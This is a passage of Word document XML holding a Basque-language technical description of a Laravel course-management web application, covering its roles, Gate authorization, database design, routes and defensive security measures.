          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>192.168.20.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP helbide pribatuarekin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Datu-fluxua:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web orrian egindako aldaketa eta eskaera guztiak sare lokal seguru baten bid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ez bidaltzen dira datu-baseko zerbitzarira.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4. Erabiltzaile motak eta baimen-sistema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pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.1. Erabiltzaile-rolak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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Aplikazioak hiru erabiltzaile-profil nagusi bereizten ditu. Rolak users taulako is_admin eta is_teacher eremu boolearren bidez kontrolatzen dira. Ikaslea bi eremu horiek false direnean identifikatzen da.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Rola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Identifikazioa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Baimen nagusiak</w:t>
            </w:r>
          </w:p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Administratzailea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is_admin = true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Administrazio-panela; erabiltzaileak, klaseak eta ikastaroak sortu/aldatu/ezabatu; irakasleak ikastaroetara esleitu.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Irakaslea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is_teacher = true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Bere ikastaroak kudeatu, ikasleak lotu/deslotu, materialak igo/ezabatu eta ikastaroen estatistikak ikusi.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Ikaslea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is_admin = false</w:t>
            </w:r>
          </w:p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is_teacher = false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Profil akademikoa osatu, baimendutako ikastaroak ikusi, matrikulatu, "Nire ikastaroak" gunea erabili eta materialak deskargatu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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lastRenderedPageBreak/>
        <w:t>4.2. Gate bidezko baimen-sistema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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Sarbide-kontrola zerbitzariaren aldean ziurtatzen da Laravel-en Gate mekanismoa erabiliz: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before="180" w:after="180" w:line="335" w:lineRule="auto"/>
        <w:ind w:left="180" w:right="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:t>Gate::define('access-admin', fn($user) =&gt; $user-&gt;is_admin === true);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:br/>
        <w:t>Gate::define('access-teacher', fn($user) =&gt; $user-&gt;is_teacher === true);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:br/>
        <w:t>Gate::define('manage-course', fn($user, $course) =&gt; $user-&gt;is_teacher === true &amp;&amp; $course-&gt;teacher_id === $user-&gt;i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:t>d);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. Funtzionalitate nagusiak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pict>
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5.1. Erregistroa eta kontuaren egiaztapena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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Erregistroan izena, emaila eta pasahitza eskatzen dira (pasahitzak gutxienez 12 karaktere izan behar ditu). Datuak bidaltzean, aplikazioak 6 digituko ausazko kode bat sortzen du eta posta elektronikoz bidaltzen du. Kodearen hash-a saioan gordetzen da (10 m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>inutuko iraungipena, gehienez 5 saiakera). Kode zuzena sartzean kontua aktibatzen da eta email_verified_at eremua betetzen da.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5.2. Saioa hasi eta Google bidezko sarbidea (OAuth)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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Login arruntak emaila eta pasahitza erabiltzen ditu, eta is_registered = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> duten kontuak bakarrik onartzen ditu. Gainera, Google OAuth bidezko sarbidea dago integratuta. Callback prozesuan state balioa egiaztatzen da CSRF erasoak saihesteko, eta egiaztatutako posta elektronikoak soilik baimentzen dira.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5.3. Profil akademikoa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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Ika</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>sleek jaiotze-data eta school_class_id eremua bete behar dituzte. EnsureStudentProfile middleware-ak ikasle bat ikastaroetara edo aginte-panelera sartzen saiatzen bada eta profil hori osatu gabe badago, automatikoki /perfil-academico orrira birbideratzen d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>u.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5.4. Ikastaroen katalogoa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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Katalogoak bilaketa, kategoria zein mailaren araberako iragazkiak eta ordenazioa eskaintzen ditu (iraupena, data edo matrikulazio kopurua). Ikasleek ezin dituzte ikastaro guztiak ikusi: beren klasearekin lotuta dagoen irakasle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>batek ematen dituen ikastaroak bakarrik ikus ditzakete.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lastRenderedPageBreak/>
        <w:t>5.5. Matrikulazioak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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Ikasle batek ikusgai duen ikastaro batean izena eman dezake. enrollments taulan user_id + course_id bikoteak UNIQUE murrizketa du, erabiltzaile bera ikastaro berean bi aldiz matrik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ulatzea eragotziz.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5.6. Irakasle-gunea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Esleitutako ikastaroak zerrendatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Bere klaseetako ikasle erregistratuak hautatzea eta ikastaroetan sartzea/kentzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Material didaktikoak igotzea eta ezabatzea (PDF, Office, testua eta irudiak, gehienez 5 MB fitxategiko).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Matrikulazioen eta fitxategien erabilera-estatistikak bistaratzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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5.7. Administrazio-panela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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Administratzaileak erabiltzaile, ikastaro eta klaseen kude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>aketa osoa egiten du. Administraziotik erabiltzaile berriak sortzean, is_registered = false egoeran uzten dira ausazko pasahitz sendo batekin, ondoren erabiltzaileak kontua bere kabuz aktiba dezan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6. Datu-basearen diseinua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pict>
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6.1. Taula nagusiak</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Taula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Funtzio nagusia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Erlazio garrantzitsuak</w:t>
            </w:r>
          </w:p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Erabiltzaileen identitatea, kontaktua, rolak eta profil akademikoa.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school_class_id → school_classes.id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courses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Ikastaroen izenburua, deskribapena, kategoria, maila, iraupena eta irakaslea.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teacher_id → users.id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enrollments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Ikasleen eta ikastaroen arteko matrikulazioak.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user_id → users.id</w:t>
            </w:r>
          </w:p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course_id → courses.id</w:t>
            </w:r>
          </w:p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UNIQUE(user_id, course_id)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school_classes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Ikastetxeko klaseak edo taldeak.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Izena bakarra (UNIQUE).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school_class_teacher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Klase baten eta irakasleen arteko N:M erlazioa.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school_class_id + user_id (PK konposatua).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course_materials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Ikastaro bati lotutako fitxategi didaktikoak.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course_id → courses.id (Cascade ezabatzean).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sessions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Autentifikazio-saioen biltegiratzea.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user_id indexatua.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password_reset_tokens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Pasahitza berreskuratzeko tokenak.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gako nagusi gisa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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6.2. Ereduen arteko erlazio logikoa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">SchoolClass </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> N User:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Klase batek ikasle asko izan ditzake.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">SchoolClass </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>N :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> M Teacher:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Klase baten eta irakasleen arteko erlazioa school_class_teacher taularen bidez bideratzen da.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">Teacher </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> N Course:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Irakasle batek hainbat ikastaro eman ditzake.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">User </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>N :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> M Course:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ikasleen eta ikastaroen arteko matrikulazioa enrollments pivot taularen bi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>dez egiten da.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">Course </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> N CourseMaterial:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ikastaro batek fitxategi didaktiko anitz eduki ditzake.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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6.3. Datuen osotasunerako mekanismoak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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Atzerriko gakoek (foreign keys) datuen arteko koherentzia babesten dute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Matrikulazioak eta materialak automatikoki ezabatzen dira (cascadeOnDelete) dagokion ikastaroa ezabatzean.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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 xml:space="preserve">Irakasle bat ezabatzean, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>courses.teacher</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>_id eremua NULL bihurtzen da (nullOnDelete).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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 xml:space="preserve">Klase bat ezabatzean, ikasleen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>users.school</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>_class_id eremua NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> bihurtzen da.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>7. Ibilbide eta kontrolatzaile nagusiak (Routing)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1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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HTTP Metodoa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Ibilbidea (Route)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Kontrolatzailea / Ekintza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Sarbide Baimena</w:t>
            </w:r>
          </w:p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HomeController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Publikoa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/cursos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CourseController@index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Publikoa (iragazki bidez)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/cursos/{course}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CourseController@show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Publikoa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GET / POST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/register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RegistrationController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Bisitaria (Guest)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GET / POST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/register/verificar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RegistrationController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Bisitaria (Guest)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GET / POST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/login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SessionController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Bisitaria (Guest)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/login/google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GoogleAuthController@redirect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Bisitaria (Guest)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/login/google/callback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GoogleAuthController@callback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Bisitaria (Guest)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GET / PUT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/perfil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AccountProfileController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Autentifikatua (Auth)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GET / PUT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/perfil-academico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StudentProfileController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Autentifikatua (Auth), Ikaslea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/mis-cursos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EnrollmentController@index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Autentifikatua (Auth)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/cursos/{course}/inscripciones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EnrollmentController@store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Autentifikatua (Auth)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/admin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AdminController@index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 + access-admin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POST/PUT/DELETE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/admin/usuarios/...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AdminUserController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 + access-admin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POST/PUT/DELETE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/admin/cursos/...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AdminCourseController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 + access-admin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 / PUT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/admin/clases/...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SchoolClassController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 + access-admin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/docencia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TeacherController@index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 + access-teacher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 / DELETE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/docencia/cursos/{course}/alumnos/...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TeacherController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 + manage-course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 / DELETE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/docencia/cursos/{course}/materiales/...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TeacherController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 + manage-course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/materiales/{courseMaterial}/descargar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TeacherController@download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 + Baimen zehatza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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/logout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SessionController@destroy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Autentifikatua (Auth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="450"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>8. Segurtasun-neurriak eta protokoloak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pict>
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.1. Babes-mekanismo orokorrak</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Neurria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Inplementazioaren xehetasuna</w:t>
            </w:r>
          </w:p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Pasahitzan Hash-a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ereduan 'password' =&gt; 'hashed' cast-a erabiltzen da (Bcrypt).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Pasahitzen Sinesgarritasuna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Gutxienez 12 karaktere (gehienez 72).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Login Rate Limiting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+ IP gakoarekin gehienez 5 saiakera; blokeoa 60 segundoz.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Erregistro Rate Limiting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Bideratzean throttle eta block middleware-ak inplementatuta.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Egiaztapen-kodea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digituko kodea, hash bidez gordeta, 10 minutuko muga eta gehienez 5 saiakera.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CSRF Babesa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Laravel-en web middleware stack-a eta token bidezko egiaztapena.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Autorizazio Handitua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access-admin, access-teacher eta manage-course Gate-ak zerbitzarian.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Saio Berrerabilpenaren Aurka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 zein Google OAuth ondoren session()-&gt;regenerate() exekutatzen da.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Logout Segurua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Saioa invalidatu eta CSRF token berria sortzen da.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Pasahitza Aldatzean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remember_token berritzen da eta saio aktibo guztiak baliogabetzen dira.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Fitxategien Igoera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MIME mota zehatzak, luzapen baimenduak eta gehienez 5 MB fitxategiko.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Datu-basearen Osotasuna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Atzerriko gakoak, UNIQUE mugak eta ezabatze kaskatuak.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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8.2. Administratzaile bakarra ez galtzeko babesa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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">AdminUserController-ek transakzioak eta lockForUpdate hautapenak erabiltzen ditu administratzaile bati rola kentzean edo kontua ezabatzean. Honek lehia-baldintzetan (race </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">conditions) gutxienez administratzaile aktibo bat sistemean geratzen dela ziurtatzen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>du. Gainera, administratzaile batek ezin du bere kontua ezabatu panel bidez.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8.3. Produkzioko segurtasun-gomendioak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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APP_DEBUG=false ezartzea produkzio ingurunean.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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HTTPS protokoloa behartzea eta SESSION_SECURE_COOKIE=true aktibatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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333333"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> fitxategia sekretuen kudeatzaile seguru batean gordetzea eta bertsio-kontroletik kanpo uztea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Google OAuth eta SMTP gakoak aldizka berritzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Igotako fitxategien biltegiratze-baimenak murriztea eta aldizkako babes-kopiak (backup) automatizatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
